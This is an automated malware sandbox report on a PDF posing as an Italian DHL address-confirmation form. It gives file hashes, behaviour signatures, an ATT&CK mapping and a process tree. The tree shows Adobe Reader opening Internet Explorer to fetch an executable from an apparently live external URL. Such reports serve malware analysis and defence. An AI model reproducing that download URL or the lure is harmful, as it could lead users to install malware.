Resubmissions

16-11-2021 12:04

211116-n8q8cadfh8 4

16-11-2021 11:58

211116-n5f8zadfg9 3

16-11-2021 11:55

211116-n3qpmaaffn 4

Analysis

  • max time kernel
    145s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-en-20211014
  • submitted
    16-11-2021 11:55

General

  • Target

    ModuloConfermaIndirizzo_2016_56.pdf

  • Size

    89KB

  • MD5

    3e4e9232f4a973055eef13a2692ffc54

  • SHA1

    94cc703064b56a0416d884be1bf6a2edb66521c1

  • SHA256

    445f1576ff067209bd366064032e5826ef4b3b0e6b299184443053be75e49289

  • SHA512

    e6958ff09ca3ac3e826ce80d91c319d67390af75632a1012694799999ab9fd6b9a00e147b62fcd681fca76502a0fa2ff345af97e7754d3dea3c4c9611258dca6

Score
1/10

Malware Config

Signatures

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\ModuloConfermaIndirizzo_2016_56.pdf"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:836
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.b-soft.it/FOTO/DHL/ModuloConfermaIndirizzo_2016.exe
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:804
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:804 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:432

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\59D5FEL2.txt
    MD5

    675b382e051c79e8bacb93a82249f42c

    SHA1

    2dca7b031bbb656a07375582f61834b40b9500e5

    SHA256

    c27e3f2582f391d1f49fdecd1541bd613d9b9bb89eb10f3b30834806f4d5b76c

    SHA512

    d2ad91e543c527152fa004d663be5f4683cbb06fcd7333e98720e129a9436bd5a53ba4b0480b9e38b28f4cd3651cdc6660fbbb9bf05b64a30ee376cb3a7d9052

  • memory/432-57-0x0000000000000000-mapping.dmp
  • memory/804-56-0x0000000000000000-mapping.dmp
  • memory/836-55-0x0000000076531000-0x0000000076533000-memory.dmp
    Filesize

    8KB